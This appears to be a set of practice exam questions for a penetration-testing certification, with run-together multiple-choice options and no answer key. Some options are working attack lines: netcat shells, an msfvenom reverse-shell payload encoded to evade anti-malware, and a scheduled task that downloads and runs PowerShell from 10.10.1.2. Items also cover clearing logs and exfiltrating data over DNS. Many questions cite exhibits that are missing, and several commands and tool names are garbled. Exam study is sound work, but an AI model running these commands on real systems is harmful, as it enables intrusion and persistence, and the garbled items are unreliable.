Pentest Test 4

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?. Lock picking. Impersonating. Jamming. Tailgating. Bypassing.

A penetration tester finds an un authenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?. nc -e /bin/sh -lp 53. /bin/sh -c 'nc -l -p 443'. nc -e /bin/sh 53. /bin/sh -c 'nc 443'.

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan: Which of the following tools should the tester use to quickly identify a potential attack path?. msfvenom. SearchSploit. sqlmap. BeEF.

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?. curl https://api.shodan.io/shodan/host/search?key=&query=hostname:. proxychains nmap -sV -T2. for i in ; do curl -k $i; done. nmap -sV -T2.

A penetration tester needs to confirm the version number of a client’s webapplication server. Which of the following techniques should the penetration tester use?. SSL certificate inspection. URL spidering. Banner grabbing. Directory brute forcing.

A penetration tester wants to identify all the TLS versions used in a web service in order to determine potentially insecure versions. Which of the following commands should the tester use?. nmap --script ssl-enum-ciphers. curl --tls-max 3. wget --server-response. openssl version.

Eight months after the completion of a penetration test, the client emails the penetration tester to debate the validity of several findings. The findings are now posing a hindrance to compliance certifications. Which of the following would most likely assist the penetration tester with de-escalation?. Testing methodology. Terms of use. Business impact analysis. Client acceptance.

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?. for user in. spray365.py. import requests.pathlib. hydra -L users.txt.

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell: schtask /create /tn Updates /tr "C: \windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru System Which of the following does this action accomplish?. Upgrades the shell performing a privilege escalation activity. Uses the Windows Update service to move the shell connection and avoid detection. Maintains access into the compromised computer. Forwards all the communication from the compromised host to the host 10.10.1.2.

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?. Clear the Windows event logs. Modify the system time. Alter the log permissions. Reduce the log retention settings.

A penetration tester is assessing the overall preparedness of a client's staff for text-message-based attacks. Which of the following most accurately describes the attack technique the tester is assessing?. Whaling. Vishing. Wardriving. Smishing.

A penetration tester attempts to access an internet-facing web page while conducting research on site. However, the web page is no longer accessible. Which of the following is the best step for the tester to take to continue gathering details?. Change the proxy settings. Try a different user agent in the browser. Locate a cached version of the page. Ask to have the site unblocked.

A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester, discuss this issue with the client?. Goal reprioritization. Peer review. Client acceptance. Stakeholder alignment.

Which of the following is a reason to use a template when creating a penetration testing report?. To articulate risks accurately. To enhance the testing approach. To contextualize collected data. To standardize needed information. To improve testing time.

During a security audit, a penetration tester wants to exploit a vulnerability in a common network protocol. The protocol allows encrypted communications to be intercepted and manipulated. Which of the following vulnerabilities should the tester exploit?. CVE-202W-ZZZZ: Cisco ASA IKEv2/IPSec Fragmentation Vulnerability. CVE-202Y-XXXX: Wireshark SSL/TLS Decryption Vulnerability. CVE-202X-YYYY: OpenSSL DROWN Attack. CVE-202Z-WWWW: Microsoft SMBv1 EternalBlue Exploit.

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?. BeEF. John the Ripper. ZAP. Evilginx.

A penetration tester is trying to execute a post-exploitation activity and creates the follow script: Which of the following best describes the tester's objective?. To download data from an API endpoint. To download data from a cloud storage. To exfiltrate data over alternate data streams. To exfiltrate data to cloud storage.

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?. Configuration changes were not reverted. A full backup restoration is required for the server. The penetration test was not completed on time. The penetration tester was locked out of the system.

A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?. nslookup mydomain.com >> /path/to/results.txt. crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com. dig @8.8.8.8 mydomain.com any >> /path/to/results.txt. cat wordlist.txt | xargs -n 1 -I 'X' host X.mydomain.com.

Which of the following should a penetration tester do when conducting postengagement cleanup?. Return the system to its original state. Close any open ports. Shut down the infected system. Delete all activity logs.

While performing a red-team exercise, a penetration tester uses a reading device to extract data from an employee's access badge. The tester creates a copy for unauthorized entry. Which of the following best describes this attack?. Smurfing. Card skimming. On-path attack. Credential stuffing.

Which of the following security controls should be implemented when systems that are covered by a compliance agreement are maintained separately from other elements of an organization's infrastructure?. Key management. Network monitoring. Data isolation. Penetration test.

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?. nmap -sU -sW -p 1-65535 example.com. nmap -sU -sY -p 1-65535 example.com. nmap -sU -sT -p 1-65535 example.com. nmap -sU -sN -p 1-65535 example.com.

A penetration tester gains access to a domain member server and wants to identify which potential targets are available to attack. Which of the following tools should the penetration tester use?. Netstat. Wireshark. Nmap. Responder.

During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which of the following is most important for the penetration tester to consider before proceeding with testing?. Rules of engagement. Business continuity planning. Agreed-upon testing hours. Application terms of use.

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?. Perform information-gathering techniques to review internet-facing assets for the company. Perform a phishing assessment to try to gain access to more resources and users’ computers. Perform a physical security review to identify vulnerabilities that could affect the company. Perform a vulnerability assessment over the main domain address provided by the client.

The following file was obtained during reconnaissance: Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?. Exposure of other users’ sensitive data. Unauthorized access to execute binaries via sudo. Hijacking the default user login shells. Corrupting the skeleton configuration file.

A penetration tester uses a pair of crutches to access a client's physical location. Which of the following is the tester most likely trying to do?. Tailgating. Impersonation. Badge cloning. Lock picking.

A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server: Which of the following logic constructs would permit the script to continue despite failure?. Add a do/while loop. Add an iterator. Add a try/except block. Add an if/else conditional.

A penetration tester obtained a shell on a Windows system. Which of the following would the tester use to gather more information about the host?. mmc.exe. icacls.exe. nltest.exe. winver.exe.

During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?. Nikto. Burp Suite. Smbclient. theHarvester.

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?. Privilege Escalation. DOM injection. Session hijacking. Cross-site scripting.

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?. Read-only. Domain Administrator. Local user. Root.

A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?. NSE. Nessus. CME. Trivy.

As part of an engagement, a penetration tester needs to scan several hundred public-facing URLs for dangerous files or outdated web server versions. Which of the following should the tester use?. Nmap. ZAP. BloodHound. Nikto.

A penetration tester identifies the following vulnerability during a scan of the company's network: An Nmap scan of the affected device produces the following results: Which of the following best describes this scenario?. True Negative. True Positive. False Positive. False Negative.

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?. OWASP MASVS. OSSTMM. MITRE ATT&CK. CREST.

A penetration tester successfully gains access to a Linux system and then uses the following command: find / -type f -ls > /tmp/recon.txt Which of the following best describes the tester's goal?. Permission enumeration. Secrets enumeration. User enumeration. Service enumeration.

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?. FTP. HTTP. SMTP. DNS.

Which of the following should be included in a penetration test report to support the tester's detailed findings?. Methodologies. Screenshots. Vulnerabilities. Remediations.

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?. A collection of email addresses for the target domain that is available on multiple sources on the internet. DNS records for the target domain and subdomains that could be used to increase the external attack surface. Data breach information about the organization that could be used for additional enumeration. information from the target's main web page that collects usernames, metadata, and possible data exposures.

A penetration tester wants to download sensitive files stored on the client's file server and runs the following scan: Which of the following TCP ports should the penetration tester target as a next step?. 21. 22. 80. 990.

A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID but an incorrect password, but the web application indicates the password is invalid. Which of the following should the tester attempt next?. Error log analysis. DoS attack. Enumeration. Password dictionary attack.

A penetration tester is conducting an IoT assessment and dumps the device firmware to a Linux machine. Which of the following Bash scripts would locate secrets in a custom binary executable downloaded from the device?. cat initializedevice | strings | grep -i "password\|shadow\token". cat initializedevice | dos2unix | grep -i "password\|shadow\|token". cat initializedevice | base64 -d | grep -i "password\|shadow\|token". cat initializedevice | grep -i "password\|shadow\|token".

After completing vulnerability scans for a given test, a penetration tester needs to prioritize which potential assets are in scope and should be exploited first. Given the following scanner output: Which of the following findings should the tester prioritize first based upon a consideration of risk to the organization?. 1. 2. 3. 4.

A penetration tester uses a Python script to enumerate open ports across a list of IP addresses. The current script runs sequentially, which slows it down during larger engagements. The tester wants to improve the script’s performance so it can handle multiple targets simultaneously. Which of the following changes is the best way to achieve this goal?. Using the time.sleep() function to throttle the scanning rate. Importing a library that allows use of workers. Replacing the range() function with a while loop. Changing the port list from a tuple to a dictionary for better lookup speed.

A penetration tester sets up a C2 server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?. ProxyChains. Convenant. PsExec. sshuttle.

A penetration tester obtains a regular domain user’s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?. Responder. CrackMapExec. Hydra. msfvenom.

A penetration tester is investigating a buffer overflow on the myfile binary. The tester wants to send a payload to help identify the exact offset to inject the memory address to take control of the buffer. Which of the following would allow the penetration tester to quickly identify the offset?. ./myfile < $(printf 'A%.0s'{1.1000}. echo 'A' Ihead -n 1000 ltr -d '\n' | ./myfile. python -c 'print("A"*1000) > test.txt; cat test.txt >./myfile. ./pattern_create.rb 1000 > test.txt; ./myfile < test.txt.

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client’s blue team. Which of the following exfiltration methods most likely remain undetected?. Cloud Storage. Email. Domain Name system. Test Storage Sites.

A penetration tester reviews the following output: Which of the following most likely describes the function of this system?. Enterprise Mail Server. Honeypot. Stand-alone web server. Domain Controller.

During a penetration test for a client that has a diverse infrastructure, the tester scans the network using Nmap and observes the following output: Which of the following would most likely be the target device?. Switch. SCADA. IoT. Router.

A tester compromises a shared host that is manually audited every week due to the absence of a SIEM. Which of the following is the best way to reduce the chances of being detected?. Modify files located in the /var/log directory. Use the clear command to remove recent terminal activity. Perform commands under one of the developer accounts. Disable all logging services on the host.

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?. BloodHound. Responder. Burp Suite. Hydra.

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?. Enumerating cached pages available on web pages. Looking for externally available services. Scanning for exposed ports associated with the domain. Searching for vulnerabilities and potential exploits.

A penetration tester gains initial access to a Windows workstation on a client’s network. The tester wants to determine the next target but does not want to install software on the workstation. Which of the following is the best tool to list potential targets?. mmc.exe. Netstat. Minikatz. explorer.exe. CME.

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results: Which of the following is most likely to cause stability when a session is created on a target machine?. Running Responder with default settings and using impacket. Running Nmap with safe scripts enabled and targeting RDP. Running Metasploit utilizing the EternalBlue module. Running Hydra on the local user at one attempt per second.

A penetration tester uses the Intruder tool from the Burp Suite Community Edition while assessing a web application. The tester notices the test is taking too long to complete. Which of the following tools can the tester use to accelerate the test and achieve similar results?. TruffleHog. Postman. Wfuzz. WPScan.

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by anti-malware that is running on the target. Which of the following commands should the tester use to obtain shell access?. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none. net user add /administrator | hexdump > payload.